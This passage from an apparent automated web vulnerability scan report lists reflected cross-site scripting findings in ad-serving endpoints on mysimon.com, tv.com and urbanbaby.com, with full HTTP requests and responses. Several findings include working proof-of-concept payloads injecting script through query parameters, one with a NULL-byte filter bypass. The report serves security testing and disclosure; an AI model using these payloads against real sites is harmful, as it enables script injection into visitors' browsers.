User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:22 GMT
Server: Apache/2.2
Content-Length: 235
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:22 GMT

/* MAC ad */;window.CBSI_PAGESTATE='b0f0f';alert(1)//f8f461066ab';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw17.cnet.com::1470073152 2011.04.27.23.18.22 *//* MAC T 0.0.0.0 */

3.658. http://mads.mysimon.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.mysimon.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 52f3c<a>42390fae500 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=852f3c<a>42390fae500&NCAT=1%3A&PTYPE=9011&CID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81221265&IREFER_HOST=cbsinteractive.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.mysimon.com
Proxy-Connection: keep-alive
Referer: http://www.mysimon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:24 GMT
Server: Apache/2.2
Content-Length: 501
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:24 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=852f3c<a>42390fae500&NCAT=1%3A&PTYPE=9011&CID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81221265&IREFER_HOST=cbsinteractive.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='85
...[SNIP]...

3.659. http://mads.tv.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.tv.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 41da3<a>cb99da4f809 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=45&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=42301944&ADREQ&beacon=141da3<a>cb99da4f809&cookiesOn=1 HTTP/1.1
Host: mads.tv.com
Proxy-Connection: keep-alive
Referer: http://www.tv.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo4NDA%3D; MAD_SESSION=c; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:21 GMT
Server: Apache/2.2
Content-Length: 430
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=45&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=42301944&ADREQ&beacon=141da3<a>cb99da4f809&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1413994809' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw4.cnet.com::1459800384
...[SNIP]...

3.660. http://mads.tv.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.tv.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8bcb'%3balert(1)//57d307aa290 was submitted in the PAGESTATE parameter. This input was echoed as e8bcb';alert(1)//57d307aa290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=e8bcb'%3balert(1)//57d307aa290&SITE=45&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=42301944&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.tv.com
Proxy-Connection: keep-alive
Referer: http://www.tv.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo4NDA%3D; MAD_SESSION=c; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:57 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:57 GMT

/* MAC ad */;window.CBSI_PAGESTATE='e8bcb';alert(1)//57d307aa290';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw5.cnet.com::1746770240 2011.04.27.23.39.57 *//* MAC T 0.0.0.0 */

3.661. http://mads.tv.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.tv.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 77606<a>89f2c0cc967 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=4577606<a>89f2c0cc967&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=42301944&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.tv.com
Proxy-Connection: keep-alive
Referer: http://www.tv.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo4NDA%3D; MAD_SESSION=c; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:58 GMT
Server: Apache/2.2
Content-Length: 464
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:58 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=4577606<a>89f2c0cc967&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=42301944&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='45776068920967' PTYPE='2001' NCAT='1:' CI
...[SNIP]...

3.662. http://mads.urbanbaby.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 30ac2<a>4cb227dec46 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=101&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=46093968&ADREQ&beacon=130ac2<a>4cb227dec46&cookiesOn=1 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://www.urbanbaby.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:49 GMT
Server: Apache/2.2
Content-Length: 433
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=101&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=46093968&ADREQ&beacon=130ac2<a>4cb227dec46&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1302422746' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw10.cnet.com::14489746
...[SNIP]...

3.663. http://mads.urbanbaby.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd9e"><script>alert(1)</script>130ed1571e5 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=40afd9e"><script>alert(1)</script>130ed1571e5&SITE=101&ADSTYLE=NOOVERGIF&_RGROUP=12992 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947447595&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:33 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:40:33 GMT
Content-Length: 1776


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=12992&sg=511218&o=&h=cn&p=2&b=40afd9e"><script>alert(1)</script>130ed1571e5&l=en_US&site=101&pt=&nd=&pid=&cid=&pp=&e=&rqid=00phx1-ad-e20:4DB897F811A936&orh=admeld.com&oepartner=&epartner=&ppartner=&pdom=tag.admeld.com&am
...[SNIP]...

3.664. http://mads.urbanbaby.com/mac-ad [CELT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 4e46a<a>3c127a61ffb was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifc4e46a<a>3c127a61ffb&BRAND=40&SITE=101&ADSTYLE=NOOVERGIF&_RGROUP=12992 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947447595&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:10 GMT
Server: Apache/2.2
Content-Length: 391
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 23:40:10 GMT

<!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT "ifc4e
...[SNIP]...

3.665. http://mads.urbanbaby.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd2df'%3balert(1)//e88c23019ae was submitted in the PAGESTATE parameter. This input was echoed as cd2df';alert(1)//e88c23019ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=cd2df'%3balert(1)//e88c23019ae&SITE=101&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=46093968&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://www.urbanbaby.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:26 GMT
Server: Apache/2.2
Content-Length: 234
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:26 GMT

/* MAC ad */;window.CBSI_PAGESTATE='cd2df';alert(1)//e88c23019ae';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw5.cnet.com::1503119680 2011.04.27.23.40.26 *//* MAC T 0.1.1.1 */

3.666. http://mads.urbanbaby.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aa9da"><x%20style%3dx%3aexpression(alert(1))>f43beda74bf was submitted in the SITE parameter. This input was echoed as aa9da"><x style=x:expression(alert(1))>f43beda74bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /mac-ad?CELT=ifc&BRAND=40&SITE=101%00aa9da"><x%20style%3dx%3aexpression(alert(1))>f43beda74bf&ADSTYLE=NOOVERGIF&_RGROUP=12992 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947707193&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.urbanbaby.com%2F
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10087&ASK05540_10174&ASK05540_10185&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10458&ASK05540_10537&ASK05540_10562&ASK05540_10265&ASK05540_10249&ASK05540_10263

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:43:58 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:43:58 GMT
Content-Length: 2749


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.urbanbaby.com/mac-ad?&_RGROUP=12992&&CNET-BRAND-ID=40&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=101.aa9da"><x style=x:expression(alert(1))>f43beda74bf&ASSET_HOST=adimg.urbanbaby.com&&&&&&&ENG:DATETIME=2011.04.27.19.43.58&SYS:RQID=01phx1-ad-e17:4DB8370F88DB4C&&REFER_HOST=tag.admeld.com&&&&&a
...[SNIP]...

3.667. http://mads.urbanbaby.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload bf7a7<a>8a71845be93 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=101bf7a7<a>8a71845be93&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=46093968&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://www.urbanbaby.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:27 GMT
Server: Apache/2.2
Content-Length: 465
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:27 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=101bf7a7<a>8a71845be93&NCAT=1&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=46093968&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='1017787184593' PTYPE='2001' NCAT='1:' CID
...[SNIP]...

3.668. http://mads.urbanbaby.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35cfa"><script>alert(1)</script>3b4be8bee53 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=40&SITE=10135cfa"><script>alert(1)</script>3b4be8bee53&ADSTYLE=NOOVERGIF&_RGROUP=12992 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947447595&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:40:35 GMT
Content-Length: 1757


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=12992&sg=507306&o=&h=cn&p=2&b=40&l=en_US&site=10135cfa"><script>alert(1)</script>3b4be8bee53&pt=&nd=&pid=&cid=&pp=&e=&rqid=01phx1-ad-e16:4DB897D711CD3C&orh=admeld.com&oepartner=&epartner=&ppartner=&pdom=tag.admeld.com&cpnmodule=&count=&a
...[SNIP]...

3.669. http://mads.urbanbaby.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d7c"><a%20b%3dc>1c598036680 was submitted in the SITE parameter. This input was echoed as 29d7c"><a b=c>1c598036680 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifc&BRAND=40&SITE=29d7c"><a%20b%3dc>1c598036680&ADSTYLE=NOOVERGIF&_RGROUP=12992 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947447595&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:55 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:40:55 GMT
Content-Length: 2507


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.urbanbaby.com/mac-ad?&_RGROUP=12992&&CNET-BRAND-ID=40&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=29d7c"><a b=c>1c598036680&ASSET_HOST=adimg.urbanbaby.com&&&&&&&ENG:DATETIME=2011.04.27.19.40.55&SYS:RQID=00phx1-ad-e20:4DB897F811C1EE&&REFER_HOST=tag.admeld.com&&&&&a
...[SNIP]...

3.670. http://mads.urbanbaby.com/mac-ad [_RGROUP parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the _RGROUP request parameter is copied into an HTML comment. The payload 16fb2--><a>80c830b7af4 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mac-ad?CELT=ifc&BRAND=40&SITE=101&ADSTYLE=NOOVERGIF&_RGROUP=1299216fb2--><a>80c830b7af4 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
